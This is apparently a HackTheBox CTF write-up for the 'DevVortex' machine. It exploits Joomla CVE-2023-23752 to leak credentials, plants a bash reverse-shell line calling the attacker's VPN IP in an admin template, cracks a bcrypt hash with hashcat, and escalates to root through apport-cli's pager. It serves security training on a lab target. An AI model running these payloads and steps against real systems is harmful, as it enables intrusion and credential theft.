Post

HackTheBox DevVortex Writeup

Posted
By x3ric
3 min read

Explore the fundamentals of cybersecurity with the DevVortex Capture The Flag (CTF) challenge, an easy-level experience ideal for beginners! This straightforward CTF writeup offers clear insights into key concepts, presented with clarity and simplicity.

Add Hosts

Edit the /etc/hosts file and add the following entries:

1

10.10.11.242 devvortex.htb dev.devvortex.htb

dev.devvortex.htb was found with a subdomain finder like:

gobuster dns -d "devvortex.htb" -w subdomains-top1million-5000.txt -t "$(nproc)"

This ensures that your system can resolve the domain names devvortex.htb and dev.devvortex.htb to the correct IP address 10.10.11.242.

Script to add hosts automatically

1
2
3

ip="10.10.11.242"
domain="devvortex.htb dev.devvortex.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV devvortex.htb

1
2
3
4
5
6
7
8
9
10

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: DevVortex
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Gather Information From Joomla

Use the following command to retrieve information from the specified API endpoint from joomla CVE-2023-23752:

1

curl "http://dev.devvortex.htb/api/index.php/v1/config/application?public=true" -s

This command fetches data from the specified URL in silent mode (-s) and displays the output.

Script to parse user,password from the result

1
2
3
4

USER=$(curl "dev.devvortex.htb/api/index.php/v1/config/application?public=true" -s | jq -r '.data[] | select(.attributes.user) | .attributes.user')
PASSWORD=$(curl "dev.devvortex.htb/api/index.php/v1/config/application?public=true" -s | jq -r '.data[] | select(.attributes.password) | .attributes.password')
DBPREFIX=$(curl "dev.devvortex.htb/api/index.php/v1/config/application?public=true" -s | jq -r '.data[] | select(.attributes.dbprefix) | .attributes.dbprefix')
echo -e "dev.devvortex.htb/administrator webpage credentials:\n usr: $USER\n pasw: $PASSWORD"

Log in to Joomla Admin Panel

Access the Joomla administrator webpage at:

http://dev.devvortex.htb/administrator

Navigate to System > Administration Templates > index.php and add the following command after <?php:

Replace <vpn-ip> with your actual VPN IP to receive the connection.

1

system('/bin/bash -c "bash -i >& /dev/tcp/<vpn-ip>/9001 0>&1"');

Then, start a listener on port 9001 to catch the reverse shell:

1

nc -lvnp 9001

Trigger the command execution by visiting the administrator webpage:

1

curl -s http://dev.devvortex.htb/administrator/index.php

Get an Interactive Shell: Once the reverse shell connects, convert it into an interactive shell:

1

python3 -c 'import pty;pty.spawn("/bin/bash")'

Press Ctrl+Z to background the shell, then run:

1

stty size; stty raw -echo; fg

As the last step, set the terminal environment:

1

export TERM=xterm;

Extract Password Hash From MySQL

Log in to MySQL using the provided credentials:

1

mysql -u '<user>' -p joomla --password='<password>'

Extract the password hash:

1
2

show tables;
select * from sd4fg_users;

Brute Force the Hash

Use an hash cracking tool like hashcat or John the Ripper to perform a brute force attack on the password hash, or use a service such as crackstation for this purpose.

1
2
3
4
5

echo -n "Password Hash? -->" ; read hash
echo "$hash" > /tmp/hash.txt
hashcat -m 3200 -a 0 /tmp/hash.txt /usr/share/dict/rockyou.txt
hashcat -m 3200 /tmp/hash.txt --show
rm -rf /tmp/hash.txt

SSH Login with Discovered Password

Once you find the password, log in via SSH using the discovered credentials:

1

ssh logan@devvortex.htb

Obtain User Flag

Retrieve the user flag by running the following command:

1

cat "$HOME/user.txt"

Privilege Escalation

run sudo -l to find the programs tath can run as root

Execute the following steps for privilege escalation:

  1. Run the command:
1

sudo /usr/bin/apport-cli -f
  • send input 1
  • send input 2
  1. View the report and Wait for approximately 10 seconds.
1

:!/bin/bash

This command exploits the less utility to spawn a shell, as described in GTFOBins.

this append because apport-cli uses less under the hood and is executed as root.

Obtain Root flag

1

cat /root/root.txt
ctf
htb cft writeup linux joomla cve-2023-23752
This post is licensed under CC BY 4.0 by the author.